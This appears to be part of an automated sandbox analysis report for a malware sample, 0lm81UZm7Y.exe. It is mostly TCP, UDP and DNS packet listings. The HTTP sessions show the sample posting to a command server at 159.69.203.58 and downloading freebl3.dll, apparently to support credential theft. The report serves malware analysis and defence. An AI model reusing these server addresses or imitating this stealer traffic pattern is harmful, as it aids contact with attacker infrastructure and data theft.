Sep 25, 2021 10:15:04.638616085 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638647079 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638659000 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638668060 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638676882 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638689995 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638708115 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638746023 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638751030 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638756990 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638780117 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638811111 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638837099 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638839960 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638844013 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638863087 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638883114 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660171032 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660207033 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660233974 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660260916 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660288095 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660312891 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660343885 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660343885 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660367966 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660373926 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660375118 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660379887 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660384893 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660401106 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660428047 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660454035 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660475016 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660475016 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660486937 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660490990 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660501957 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660528898 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660548925 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660554886 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660567045 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660600901 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660605907 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660612106 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660621881 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660640001 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660660028 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660682917 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660690069 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660701990 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660722017 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660725117 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660732985 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660737991 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660742044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660762072 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660783052 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660788059 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660799980 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660819054 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660837889 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660851955 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660871029 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660882950 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660892010 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660897017 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660903931 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660909891 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660928965 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660937071 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.660959959 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.660985947 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.661011934 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.661036015 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.661040068 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.661048889 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.661058903 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.661068916 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.661071062 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.661078930 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.661096096 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.661122084 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.661139965 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.661149979 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.661150932 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.661164999 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.661958933 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.686398029 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.708925009 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709032059 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709145069 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709146023 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709172010 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709225893 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709286928 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709285975 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709331989 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709369898 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709409952 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709428072 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709443092 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709449053 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709486961 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709526062 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709549904 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709558964 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709563971 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709610939 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709628105 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709635973 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709654093 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709692001 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709714890 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709726095 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709729910 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709768057 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709791899 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709803104 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709804058 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709826946 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709841967 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709880114 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709906101 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709919930 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709928036 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.709945917 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.709971905 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710010052 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710051060 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710055113 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710061073 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710093975 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710133076 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710133076 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710139990 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710170984 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710208893 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710210085 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710216045 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710257053 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710284948 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710299015 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710299969 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710336924 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710371017 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710375071 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710381985 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710412979 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710447073 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710449934 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710454941 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710488081 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710525990 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710525990 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710536003 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710578918 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710602045 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710612059 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710622072 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710659981 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710694075 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710697889 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710701942 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710736036 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710773945 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710776091 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710789919 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710812092 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710815907 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710850000 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710895061 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710897923 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710905075 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710942030 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710978031 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.710979939 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.710984945 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711018085 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711052895 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711055994 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711060047 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711093903 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711163044 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711179972 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711189032 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711219072 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711276054 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711329937 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711349964 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711374998 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711414099 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711451054 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711469889 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711481094 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711502075 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711544991 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711582899 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711585045 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711595058 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711622000 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711661100 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711661100 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711669922 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711699963 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711736917 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.711740971 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711755037 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711817026 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.711831093 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:10.041330099 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:10.041371107 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:10.063205004 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.063230991 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.063308954 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:10.063343048 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.063365936 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:10.063405991 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:10.063427925 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.063489914 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:10.086045980 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.086066008 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.086175919 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.086191893 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:10.086195946 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.086220026 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:10.086246967 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:10.086271048 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:10.086319923 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.086329937 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.086389065 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:10.086422920 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:10.086426020 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.086605072 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:10.108239889 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.108264923 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.108294964 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.108349085 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.108403921 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.108438015 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.108566046 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.108623981 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.108643055 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.108798027 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.108814001 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.108840942 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.108854055 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.108866930 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.368840933 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:10.368989944 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:14.864765882 CEST	49744	80	192.168.2.5	159.69.203.58

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2021 10:14:49.352760077 CEST	59596	53	192.168.2.5	8.8.8.8
Sep 25, 2021 10:14:49.378667116 CEST	53	59596	8.8.8.8	192.168.2.5
Sep 25, 2021 10:15:02.481113911 CEST	65296	53	192.168.2.5	8.8.8.8
Sep 25, 2021 10:15:02.501431942 CEST	53	65296	8.8.8.8	192.168.2.5
Sep 25, 2021 10:15:07.828792095 CEST	63183	53	192.168.2.5	8.8.8.8
Sep 25, 2021 10:15:07.851356030 CEST	53	63183	8.8.8.8	192.168.2.5
Sep 25, 2021 10:15:20.782382011 CEST	55161	53	192.168.2.5	8.8.8.8
Sep 25, 2021 10:15:20.808279991 CEST	53	55161	8.8.8.8	192.168.2.5
Sep 25, 2021 10:15:40.442965984 CEST	54757	53	192.168.2.5	8.8.8.8
Sep 25, 2021 10:15:40.476650000 CEST	53	54757	8.8.8.8	192.168.2.5
Sep 25, 2021 10:15:42.396580935 CEST	49992	53	192.168.2.5	8.8.8.8
Sep 25, 2021 10:15:42.419473886 CEST	53	49992	8.8.8.8	192.168.2.5
Sep 25, 2021 10:15:56.102807045 CEST	60075	53	192.168.2.5	8.8.8.8
Sep 25, 2021 10:15:56.138490915 CEST	53	60075	8.8.8.8	192.168.2.5
Sep 25, 2021 10:16:00.064898968 CEST	55016	53	192.168.2.5	8.8.8.8
Sep 25, 2021 10:16:00.087326050 CEST	53	55016	8.8.8.8	192.168.2.5
Sep 25, 2021 10:16:34.739523888 CEST	64345	53	192.168.2.5	8.8.8.8
Sep 25, 2021 10:16:34.765537024 CEST	53	64345	8.8.8.8	192.168.2.5
Sep 25, 2021 10:16:36.430593967 CEST	57128	53	192.168.2.5	8.8.8.8
Sep 25, 2021 10:16:36.459225893 CEST	53	57128	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 25, 2021 10:15:02.481113911 CEST	192.168.2.5	8.8.8.8	0x3793	Standard query (0)	mas.to	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 25, 2021 10:15:02.501431942 CEST	8.8.8.8	192.168.2.5	0x3793	No error (0)	mas.to		88.99.75.82	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

mas.to

159.69.203.58

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49743	88.99.75.82	443	C:\Users\user\Desktop\0lm81UZm7Y.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49744	159.69.203.58	80	C:\Users\user\Desktop\0lm81UZm7Y.exe

Timestamp	kBytes transferred	Direction	Data
Sep 25, 2021 10:15:03.246696949 CEST	1055	OUT	POST /1008 HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 159.69.203.58 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Sep 25, 2021 10:15:03.361848116 CEST	1056	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 Sep 2021 08:15:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 8c b1 0a 83 30 10 86 9f c6 25 48 50 8b 4b 32 d6 4e 1d 2c d4 6e 5d ae 31 5a 31 21 21 b9 ab f5 ed 2b c9 58 0e fe ef 3b f8 ef ea b2 fe 9b a6 ad ca 4e 4f 40 06 65 d1 5d ee d7 a1 bf 15 4f c9 38 7e 51 30 3e c2 91 1b 18 a3 91 71 26 58 33 41 e2 0b d4 4a 3e a9 72 a3 4e e2 21 c6 cd 85 31 2d 40 f8 4e 32 3b 37 9b 5c 20 54 89 8f e1 9c 2f c3 ee f3 db 55 ef 07 65 5b 49 0c a4 a5 75 9f 45 47 61 29 2e 4a 58 7f 92 3f 78 84 d6 b9 ba 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 99e0%HPK2N,n]1Z1!!+X;NO@e]O8~Q0>q&X3AJ>rN!1-@N2;7\ T/Ue[IuEGa).JX?x0
Sep 25, 2021 10:15:03.365328074 CEST	1056	OUT	GET /freebl3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 159.69.203.58 Connection: Keep-Alive
Sep 25, 2021 10:15:03.387567043 CEST	1058	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 Sep 2021 08:15:03 GMT Content-Type: application/x-msdos-program Content-Length: 334288 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "519d0-57aa1f0b0df80" Expires: Sun, 26 Sep 2021 08:15:03 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 